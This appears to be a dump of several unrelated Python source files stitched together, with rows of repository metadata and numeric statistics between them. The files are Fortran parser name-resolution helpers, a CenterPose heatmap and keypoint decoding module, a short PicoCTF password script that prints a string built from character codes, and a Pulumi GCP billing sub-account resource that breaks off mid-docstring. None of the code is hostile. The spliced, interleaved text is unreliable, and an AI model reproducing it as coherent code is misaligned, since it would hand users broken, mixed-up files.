    get_name_or_defer(stmt, node.items[1], res_typedecl, config)

def search_Type_Guard_Stmt(stmt, node, config, gentype=None):
    """Resolve the guard type (items[1]) of a Type_Guard_Stmt node."""
    get_name_or_defer(stmt, node.items[1], res_typespec, config)

def search_Implicit_Spec(stmt, node, config, gentype=None):
    """
    <implicit-spec> = <declaration-type-spec> ( <letter-spec-list> )
    """
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_typespec, config)

def search_Letter_Spec(stmt, node, config, gentype=None):
    """A Letter_Spec node carries no name that needs resolution."""

def search_Procedure_Declaration_Stmt(stmt, node, config, gentype=None):
    """Resolve the interface (items[0]) and declared procedures (items[1])."""
    get_name_or_defer(stmt, node.items[0], [Interface], config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Binding_PASS_Arg_Name(stmt, node, config, gentype=None):
    """A Binding_PASS_Arg_Name node carries no name that needs resolution."""

def search_Char_Selector(stmt, node, config, gentype=None):
    """Resolve names appearing in a Char_Selector node."""
    for idx in (0, 1):
        get_name_or_defer(stmt, node.items[idx], res_value, config)

def search_Enum_Def_Stmt(stmt, node, config, gentype=None):
    """An Enum_Def_Stmt node carries no name that needs resolution."""

def search_Enumerator_Def_Stmt(stmt, node, config, gentype=None):
    """Resolve the enumerator list (items[1]) of an Enumerator_Def_Stmt."""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Enumerator(stmt, node, config, gentype=None):
    """Resolve the initializer expression (items[2]) of an Enumerator."""
    get_name_or_defer(stmt, node.items[2], res_value, config)
| 43.843121
| 120
| 0.697384
| 7,584
| 52,261
| 4.564082
| 0.050369
| 0.119489
| 0.067343
| 0.104755
| 0.815855
| 0.771451
| 0.752441
| 0.737101
| 0.727509
| 0.703675
| 0
| 0.0109
| 0.180192
| 52,261
| 1,191
| 121
| 43.879933
| 0.797008
| 0.20367
| 0
| 0.500739
| 0
| 0
| 0.024076
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.273264
| false
| 0.04579
| 0.023634
| 0
| 0.305761
| 0.01034
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff59b00d20c33151f9f2dd25610a80e8b73fe9b2
| 12,098
|
py
|
Python
|
lib/models/decode.py
|
shachargluska/centerpose
|
01c2c8bfa9d3ee91807f2ffdcc48728d104265bd
|
[
"MIT"
] | 245
|
2019-11-29T02:55:25.000Z
|
2022-03-30T07:30:18.000Z
|
lib/models/decode.py
|
shachargluska/centerpose
|
01c2c8bfa9d3ee91807f2ffdcc48728d104265bd
|
[
"MIT"
] | 24
|
2019-11-29T10:05:00.000Z
|
2022-03-30T07:16:06.000Z
|
lib/models/decode.py
|
FishLiuabc/centerpose
|
555d753cd82693476f91f78c53aa4147f5a83015
|
[
"MIT"
] | 45
|
2019-11-29T05:12:02.000Z
|
2022-03-21T02:20:36.000Z
|
from __future__ import absolute_import, division, print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import _gather_feat, _transpose_and_gather_feat
def _nms(heat, kernel=3):
pad = (kernel - 1) // 2
hmax = nn.functional.max_pool2d(
heat, (kernel, kernel), stride=1, padding=pad)
keep = (hmax == heat).float()
return heat * keep
def _left_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(1, heat.shape[0]):
inds = (heat[i] >= heat[i - 1])
ret[i] += ret[i - 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape)
def _right_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(heat.shape[0] - 2, -1, -1):
inds = (heat[i] >= heat[i +1])
ret[i] += ret[i + 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape)
def _top_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
heat = heat.transpose(3, 2)
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(1, heat.shape[0]):
inds = (heat[i] >= heat[i - 1])
ret[i] += ret[i - 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape).transpose(3, 2)
def _bottom_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
heat = heat.transpose(3, 2)
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(heat.shape[0] - 2, -1, -1):
inds = (heat[i] >= heat[i + 1])
ret[i] += ret[i + 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape).transpose(3, 2)
def _h_aggregate(heat, aggr_weight=0.1):
    """Blend weighted left/right aggregations back into the heatmap."""
    return (aggr_weight * _left_aggregate(heat)
            + aggr_weight * _right_aggregate(heat)
            + heat)
def _v_aggregate(heat, aggr_weight=0.1):
    """Blend weighted top/bottom aggregations back into the heatmap."""
    return (aggr_weight * _top_aggregate(heat)
            + aggr_weight * _bottom_aggregate(heat)
            + heat)
def _topk_channel(scores, K=40):
batch, cat, height, width = scores.size()
topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), K)
topk_inds = topk_inds % (height * width)
topk_ys = (topk_inds / width).int().float()
topk_xs = (topk_inds % width).int().float()
return topk_scores, topk_inds, topk_ys, topk_xs
def _topk(scores, K=40):
    """Global top-K over all categories of a heatmap.

    Args:
        scores: tensor of shape (batch, cat, height, width).
        K: number of detections to keep per image.

    Returns:
        (topk_score, topk_inds, topk_clses, topk_ys, topk_xs), each of
        shape (batch, K); `topk_inds` are flattened spatial indices and
        `topk_clses` the category index of each kept peak.
    """
    batch, cat, height, width = scores.size()

    # first: top K within each category channel
    topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), K)

    topk_inds = topk_inds % (height * width)
    # Use explicit floor division: plain `/` on integer tensors is rejected
    # by torch 1.5-1.7 and yields float results on torch >= 1.8, so the
    # original `(topk_inds / width).int()` broke on modern PyTorch.
    topk_ys = torch.div(topk_inds, width, rounding_mode='floor').int().float()
    topk_xs = (topk_inds % width).int().float()

    # second: top K across the cat*K per-channel candidates
    topk_score, topk_ind = torch.topk(topk_scores.view(batch, -1), K)
    # candidate index // K recovers the category (same floor-division fix)
    topk_clses = torch.div(topk_ind, K, rounding_mode='floor').int()
    topk_inds = _gather_feat(
        topk_inds.view(batch, -1, 1), topk_ind).view(batch, K)
    topk_ys = _gather_feat(topk_ys.view(batch, -1, 1), topk_ind).view(batch, K)
    topk_xs = _gather_feat(topk_xs.view(batch, -1, 1), topk_ind).view(batch, K)

    return topk_score, topk_inds, topk_clses, topk_ys, topk_xs
def ctdet_decode(heat, wh, reg=None, cat_spec_wh=False, K=100):
    """Decode CenterNet detection outputs into (batch, K, 6) detections.

    heat: center heatmap (batch, cat, height, width); assumed already
        sigmoid-activated (see the commented-out line below).
    wh:   width/height regression map.
    reg:  optional sub-pixel center-offset map.
    cat_spec_wh: if True, `wh` carries a separate (w, h) per category.
    K:    number of detections kept per image.

    Returns a tensor whose last dim is [x1, y1, x2, y2, score, class].
    """
    batch, cat, height, width = heat.size()

    # heat = torch.sigmoid(heat)
    # perform nms on heatmaps
    heat = _nms(heat)

    scores, inds, clses, ys, xs = _topk(heat, K=K)
    if reg is not None:
        # refine integer peak coordinates with the predicted offsets
        reg = _transpose_and_gather_feat(reg, inds)
        reg = reg.view(batch, K, 2)
        xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
        ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
    else:
        # no offset head: place centers at cell midpoints
        xs = xs.view(batch, K, 1) + 0.5
        ys = ys.view(batch, K, 1) + 0.5
    wh = _transpose_and_gather_feat(wh, inds)
    if cat_spec_wh:
        # pick the (w, h) pair predicted for each detection's own class
        wh = wh.view(batch, K, cat, 2)
        clses_ind = clses.view(batch, K, 1, 1).expand(batch, K, 1, 2).long()
        wh = wh.gather(2, clses_ind).view(batch, K, 2)
    else:
        wh = wh.view(batch, K, 2)
    clses = clses.view(batch, K, 1).float()
    scores = scores.view(batch, K, 1)
    # axis-aligned boxes centered on (xs, ys)
    bboxes = torch.cat([xs - wh[..., 0:1] / 2,
                        ys - wh[..., 1:2] / 2,
                        xs + wh[..., 0:1] / 2,
                        ys + wh[..., 1:2] / 2], dim=2)
    detections = torch.cat([bboxes, scores, clses], dim=2)

    return detections
def whole_body_decode(
        heat, wh, kps, seg_feat=None, seg=None, reg=None, hm_hp=None, hp_offset=None, K=100):
    """Decode whole-body pose outputs into detections plus a segmentation map.

    heat: person-center heatmap (batch, cat, height, width).
    wh:   width/height regression map.
    kps:  joint-offset map with 2 * num_joints channels (dx, dy per joint
          relative to the person center).
    seg_feat / seg: segmentation feature map and per-detection dynamic
          conv-weight map used to predict instance segmentation.
    reg:  optional sub-pixel center-offset map.
    hm_hp: optional per-joint keypoint heatmap used to snap regressed
          joints onto detected keypoint peaks.
    hp_offset: optional sub-pixel offsets for the keypoint heatmap.
    K:    detections kept per image.

    Returns (detections, pred_seg) where detections is
    (batch, K, 4 + 1 + 2*num_joints + num_joints):
    [bbox(4), score(1), joint xy pairs, per-joint heatmap scores].
    """
    batch, cat, height, width = heat.size()
    num_joints = kps.shape[1] // 2
    # perform nms on heatmaps
    heat = _nms(heat)
    scores, inds, clses, ys, xs = _topk(heat, K=K)

    # gather joint offsets at the kept centers; in-place add converts the
    # relative offsets into absolute joint coordinates
    kps = _transpose_and_gather_feat(kps, inds)
    kps = kps.view(batch, K, num_joints * 2)
    kps[..., ::2] += xs.view(batch, K, 1).expand(batch, K, num_joints)
    kps[..., 1::2] += ys.view(batch, K, 1).expand(batch, K, num_joints)
    if reg is not None:
        # refine integer peak coordinates with the predicted offsets
        reg = _transpose_and_gather_feat(reg, inds)
        reg = reg.view(batch, K, 2)
        xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
        ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
    else:
        xs = xs.view(batch, K, 1) + 0.5
        ys = ys.view(batch, K, 1) + 0.5
    wh = _transpose_and_gather_feat(wh, inds)
    wh = wh.view(batch, K, 2)

    # dynamic convolution: the gathered weights become K 3x3 kernels applied
    # to seg_feat. NOTE(review): the reshape uses weight.size(1) (= K) as the
    # out-channel count, which appears to assume batch == 1 -- confirm.
    weight = _transpose_and_gather_feat(seg, inds)
    ## you can write (if weight.size(1)!=seg_feat.size(1): 3x3conv else 1x1conv ) here to select seg conv.
    ## for 3x3
    weight = weight.view([weight.size(1), -1, 3, 3])
    pred_seg = F.conv2d(seg_feat, weight, stride=1, padding=1)

    clses = clses.view(batch, K, 1).float()
    scores = scores.view(batch, K, 1)

    bboxes = torch.cat([xs - wh[..., 0:1] / 2,
                        ys - wh[..., 1:2] / 2,
                        xs + wh[..., 0:1] / 2,
                        ys + wh[..., 1:2] / 2], dim=2)
    if hm_hp is not None:
        # snap regressed joints onto nearby keypoint-heatmap peaks
        hm_hp = _nms(hm_hp)
        thresh = 0.1
        kps = kps.view(batch, K, num_joints, 2).permute(
            0, 2, 1, 3).contiguous()  # b x J x K x 2
        reg_kps = kps.unsqueeze(3).expand(batch, num_joints, K, K, 2)
        hm_score, hm_inds, hm_ys, hm_xs = _topk_channel(hm_hp, K=K)  # b x J x K
        if hp_offset is not None:
            hp_offset = _transpose_and_gather_feat(
                hp_offset, hm_inds.view(batch, -1))
            hp_offset = hp_offset.view(batch, num_joints, K, 2)
            hm_xs = hm_xs + hp_offset[:, :, :, 0]
            hm_ys = hm_ys + hp_offset[:, :, :, 1]
        else:
            hm_xs = hm_xs + 0.5
            hm_ys = hm_ys + 0.5

        # push low-confidence peaks far away so they are never matched
        mask = (hm_score > thresh).float()
        hm_score = (1 - mask) * -1 + mask * hm_score
        hm_ys = (1 - mask) * (-10000) + mask * hm_ys
        hm_xs = (1 - mask) * (-10000) + mask * hm_xs
        hm_kps = torch.stack([hm_xs, hm_ys], dim=-1).unsqueeze(
            2).expand(batch, num_joints, K, K, 2)
        # nearest heatmap peak for each regressed joint (L2 distance)
        dist = (((reg_kps - hm_kps) ** 2).sum(dim=4) ** 0.5)
        min_dist, min_ind = dist.min(dim=3)  # b x J x K
        hm_score = hm_score.gather(2, min_ind).unsqueeze(-1)  # b x J x K x 1
        min_dist = min_dist.unsqueeze(-1)
        min_ind = min_ind.view(batch, num_joints, K, 1, 1).expand(
            batch, num_joints, K, 1, 2)
        hm_kps = hm_kps.gather(3, min_ind)
        hm_kps = hm_kps.view(batch, num_joints, K, 2)
        # reject matches that fall outside the detection box, score below
        # threshold, or lie too far from the regressed joint
        l = bboxes[:, :, 0].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        t = bboxes[:, :, 1].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        r = bboxes[:, :, 2].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        b = bboxes[:, :, 3].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        mask = (hm_kps[..., 0:1] < l) + (hm_kps[..., 0:1] > r) + \
               (hm_kps[..., 1:2] < t) + (hm_kps[..., 1:2] > b) + \
               (hm_score < thresh) + (min_dist > (torch.max(b - t, r - l) * 0.3))
        mask = (mask > 0).float().expand(batch, num_joints, K, 2)
        # keep the heatmap peak where the match is valid, else the regression
        kps = (1 - mask) * hm_kps + mask * kps
        kps = kps.permute(0, 2, 1, 3).contiguous().view(
            batch, K, num_joints * 2)
    detections = torch.cat([bboxes, scores, kps, torch.transpose(hm_score.squeeze(dim=3), 1, 2)], dim=2)

    return detections, pred_seg
def multi_pose_decode(
        heat, wh, kps, reg=None, hm_hp=None, hp_offset=None, K=100):
    """Decode multi-person pose outputs into (batch, K, ...) detections.

    Same pipeline as whole_body_decode but without the segmentation head.

    heat: person-center heatmap (batch, cat, height, width); assumed
        already sigmoid-activated (see the commented-out line below).
    wh:   width/height regression map.
    kps:  joint-offset map with 2 * num_joints channels.
    reg:  optional sub-pixel center-offset map.
    hm_hp: optional per-joint keypoint heatmap used to snap regressed
        joints onto detected keypoint peaks.
    hp_offset: optional sub-pixel offsets for the keypoint heatmap.
    K:    detections kept per image.

    Returns detections whose last dim is
    [bbox(4), score(1), joint xy pairs, per-joint heatmap scores].
    """
    batch, cat, height, width = heat.size()
    num_joints = kps.shape[1] // 2
    # heat = torch.sigmoid(heat)
    # perform nms on heatmaps
    heat = _nms(heat)
    scores, inds, clses, ys, xs = _topk(heat, K=K)

    # gather joint offsets at the kept centers; in-place add converts the
    # relative offsets into absolute joint coordinates
    kps = _transpose_and_gather_feat(kps, inds)
    kps = kps.view(batch, K, num_joints * 2)
    kps[..., ::2] += xs.view(batch, K, 1).expand(batch, K, num_joints)
    kps[..., 1::2] += ys.view(batch, K, 1).expand(batch, K, num_joints)
    if reg is not None:
        # refine integer peak coordinates with the predicted offsets
        reg = _transpose_and_gather_feat(reg, inds)
        reg = reg.view(batch, K, 2)
        xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
        ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
    else:
        xs = xs.view(batch, K, 1) + 0.5
        ys = ys.view(batch, K, 1) + 0.5
    wh = _transpose_and_gather_feat(wh, inds)
    wh = wh.view(batch, K, 2)
    clses = clses.view(batch, K, 1).float()
    scores = scores.view(batch, K, 1)

    bboxes = torch.cat([xs - wh[..., 0:1] / 2,
                        ys - wh[..., 1:2] / 2,
                        xs + wh[..., 0:1] / 2,
                        ys + wh[..., 1:2] / 2], dim=2)
    if hm_hp is not None:
        # snap regressed joints onto nearby keypoint-heatmap peaks
        hm_hp = _nms(hm_hp)
        thresh = 0.1
        kps = kps.view(batch, K, num_joints, 2).permute(
            0, 2, 1, 3).contiguous()  # b x J x K x 2
        reg_kps = kps.unsqueeze(3).expand(batch, num_joints, K, K, 2)
        hm_score, hm_inds, hm_ys, hm_xs = _topk_channel(hm_hp, K=K)  # b x J x K
        if hp_offset is not None:
            hp_offset = _transpose_and_gather_feat(
                hp_offset, hm_inds.view(batch, -1))
            hp_offset = hp_offset.view(batch, num_joints, K, 2)
            hm_xs = hm_xs + hp_offset[:, :, :, 0]
            hm_ys = hm_ys + hp_offset[:, :, :, 1]
        else:
            hm_xs = hm_xs + 0.5
            hm_ys = hm_ys + 0.5

        # push low-confidence peaks far away so they are never matched
        mask = (hm_score > thresh).float()
        hm_score = (1 - mask) * -1 + mask * hm_score
        hm_ys = (1 - mask) * (-10000) + mask * hm_ys
        hm_xs = (1 - mask) * (-10000) + mask * hm_xs
        hm_kps = torch.stack([hm_xs, hm_ys], dim=-1).unsqueeze(
            2).expand(batch, num_joints, K, K, 2)
        # nearest heatmap peak for each regressed joint (L2 distance)
        dist = (((reg_kps - hm_kps) ** 2).sum(dim=4) ** 0.5)
        min_dist, min_ind = dist.min(dim=3)  # b x J x K
        hm_score = hm_score.gather(2, min_ind).unsqueeze(-1)  # b x J x K x 1
        min_dist = min_dist.unsqueeze(-1)
        min_ind = min_ind.view(batch, num_joints, K, 1, 1).expand(
            batch, num_joints, K, 1, 2)
        hm_kps = hm_kps.gather(3, min_ind)
        hm_kps = hm_kps.view(batch, num_joints, K, 2)
        # reject matches that fall outside the detection box, score below
        # threshold, or lie too far from the regressed joint
        l = bboxes[:, :, 0].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        t = bboxes[:, :, 1].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        r = bboxes[:, :, 2].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        b = bboxes[:, :, 3].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
        mask = (hm_kps[..., 0:1] < l) + (hm_kps[..., 0:1] > r) + \
               (hm_kps[..., 1:2] < t) + (hm_kps[..., 1:2] > b) + \
               (hm_score < thresh) + (min_dist > (torch.max(b - t, r - l) * 0.3))
        mask = (mask > 0).float().expand(batch, num_joints, K, 2)
        # keep the heatmap peak where the match is valid, else the regression
        kps = (1 - mask) * hm_kps + mask * kps
        kps = kps.permute(0, 2, 1, 3).contiguous().view(
            batch, K, num_joints * 2)
    detections = torch.cat([bboxes, scores, kps, torch.transpose(hm_score.squeeze(dim=3), 1, 2)], dim=2)

    return detections
| 39.152104
| 108
| 0.54943
| 1,940
| 12,098
| 3.263402
| 0.069588
| 0.088138
| 0.063181
| 0.039962
| 0.844732
| 0.83336
| 0.827989
| 0.827989
| 0.823093
| 0.805718
| 0
| 0.044273
| 0.281204
| 12,098
| 308
| 109
| 39.279221
| 0.683763
| 0.039015
| 0
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.020576
| 0.00823
| 0.119342
| 0.004115
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff5ee34cbb032159de8722c2021b6a308810f1e1
| 109
|
py
|
Python
|
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
# The password is built from character codes: 0x63 'c' followed by three
# 0x30 '0's (prints "c000").
print("".join(chr(code) for code in (0x63, 0x30, 0x30, 0x30)))
| 54.5
| 56
| 0.623853
| 19
| 109
| 3.526316
| 0.315789
| 0.626866
| 0.597015
| 0.835821
| 0.835821
| 0.835821
| 0.835821
| 0.835821
| 0
| 0
| 0
| 0.255319
| 0.137615
| 109
| 2
| 57
| 54.5
| 0.457447
| 0.504587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.296296
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
92aafc032fdf290c0c3da48a458889f25e12534f
| 16,790
|
py
|
Python
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SubAccountArgs', 'SubAccount']
@pulumi.input_type
class SubAccountArgs:
    # tfgen-generated Pulumi input type. @pulumi.input_type introspects the
    # __init__ signature and the @pulumi.getter properties below, so the code
    # is deliberately left untouched here — comments/docs only.
    def __init__(__self__, *,
                 display_name: pulumi.Input[str],
                 master_billing_account: pulumi.Input[str],
                 deletion_policy: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a SubAccount resource.

        :param pulumi.Input[str] display_name: The display name of the billing account.
        :param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
               will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        :param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
               will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
               Default is "".
        """
        # Required inputs are stored unconditionally; the optional policy is
        # only stored when the caller actually supplied one.
        pulumi.set(__self__, "display_name", display_name)
        pulumi.set(__self__, "master_billing_account", master_billing_account)
        if deletion_policy is not None:
            pulumi.set(__self__, "deletion_policy", deletion_policy)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Input[str]:
        """
        The display name of the billing account.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="masterBillingAccount")
    def master_billing_account(self) -> pulumi.Input[str]:
        """
        The name of the master billing account that the subaccount
        will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        """
        return pulumi.get(self, "master_billing_account")

    @master_billing_account.setter
    def master_billing_account(self, value: pulumi.Input[str]):
        pulumi.set(self, "master_billing_account", value)

    @property
    @pulumi.getter(name="deletionPolicy")
    def deletion_policy(self) -> Optional[pulumi.Input[str]]:
        """
        If set to "RENAME_ON_DESTROY" the billing account display_name
        will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
        Default is "".
        """
        return pulumi.get(self, "deletion_policy")

    @deletion_policy.setter
    def deletion_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deletion_policy", value)
@pulumi.input_type
class _SubAccountState:
    # tfgen-generated state bundle used by SubAccount.get() when looking up an
    # existing resource; every field is optional. Code left untouched —
    # @pulumi.input_type introspects this exact structure.
    def __init__(__self__, *,
                 billing_account_id: Optional[pulumi.Input[str]] = None,
                 deletion_policy: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 master_billing_account: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 open: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering SubAccount resources.

        :param pulumi.Input[str] billing_account_id: The billing account id.
        :param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
               will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
               Default is "".
        :param pulumi.Input[str] display_name: The display name of the billing account.
        :param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
               will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        :param pulumi.Input[str] name: The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
        :param pulumi.Input[bool] open: `true` if the billing account is open, `false` if the billing account is closed.
        """
        # Only properties actually provided are recorded, so an absent field
        # stays distinguishable from an explicit None.
        if billing_account_id is not None:
            pulumi.set(__self__, "billing_account_id", billing_account_id)
        if deletion_policy is not None:
            pulumi.set(__self__, "deletion_policy", deletion_policy)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if master_billing_account is not None:
            pulumi.set(__self__, "master_billing_account", master_billing_account)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if open is not None:
            pulumi.set(__self__, "open", open)

    @property
    @pulumi.getter(name="billingAccountId")
    def billing_account_id(self) -> Optional[pulumi.Input[str]]:
        """
        The billing account id.
        """
        return pulumi.get(self, "billing_account_id")

    @billing_account_id.setter
    def billing_account_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "billing_account_id", value)

    @property
    @pulumi.getter(name="deletionPolicy")
    def deletion_policy(self) -> Optional[pulumi.Input[str]]:
        """
        If set to "RENAME_ON_DESTROY" the billing account display_name
        will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
        Default is "".
        """
        return pulumi.get(self, "deletion_policy")

    @deletion_policy.setter
    def deletion_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "deletion_policy", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        The display name of the billing account.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="masterBillingAccount")
    def master_billing_account(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the master billing account that the subaccount
        will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        """
        return pulumi.get(self, "master_billing_account")

    @master_billing_account.setter
    def master_billing_account(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_billing_account", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def open(self) -> Optional[pulumi.Input[bool]]:
        """
        `true` if the billing account is open, `false` if the billing account is closed.
        """
        return pulumi.get(self, "open")

    @open.setter
    def open(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "open", value)
class SubAccount(pulumi.CustomResource):
    # tfgen-generated resource class; code left untouched (comments/docs only)
    # because the Pulumi runtime relies on this exact overload/dispatch shape.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 deletion_policy: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 master_billing_account: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Allows creation and management of a Google Cloud Billing Subaccount.

        !> **WARNING:** Deleting this resource will not delete or close the billing subaccount.

        ```python
        import pulumi
        import pulumi_gcp as gcp

        subaccount = gcp.billing.SubAccount("subaccount",
            display_name="My Billing Account",
            master_billing_account="012345-567890-ABCDEF")
        ```

        ## Import

        Billing Subaccounts can be imported using any of these accepted formats

        ```sh
         $ pulumi import gcp:billing/subAccount:SubAccount default billingAccounts/{billing_account_id}
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
               will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
               Default is "".
        :param pulumi.Input[str] display_name: The display name of the billing account.
        :param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
               will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SubAccountArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Allows creation and management of a Google Cloud Billing Subaccount.

        !> **WARNING:** Deleting this resource will not delete or close the billing subaccount.

        ```python
        import pulumi
        import pulumi_gcp as gcp

        subaccount = gcp.billing.SubAccount("subaccount",
            display_name="My Billing Account",
            master_billing_account="012345-567890-ABCDEF")
        ```

        ## Import

        Billing Subaccounts can be imported using any of these accepted formats

        ```sh
         $ pulumi import gcp:billing/subAccount:SubAccount default billingAccounts/{billing_account_id}
        ```

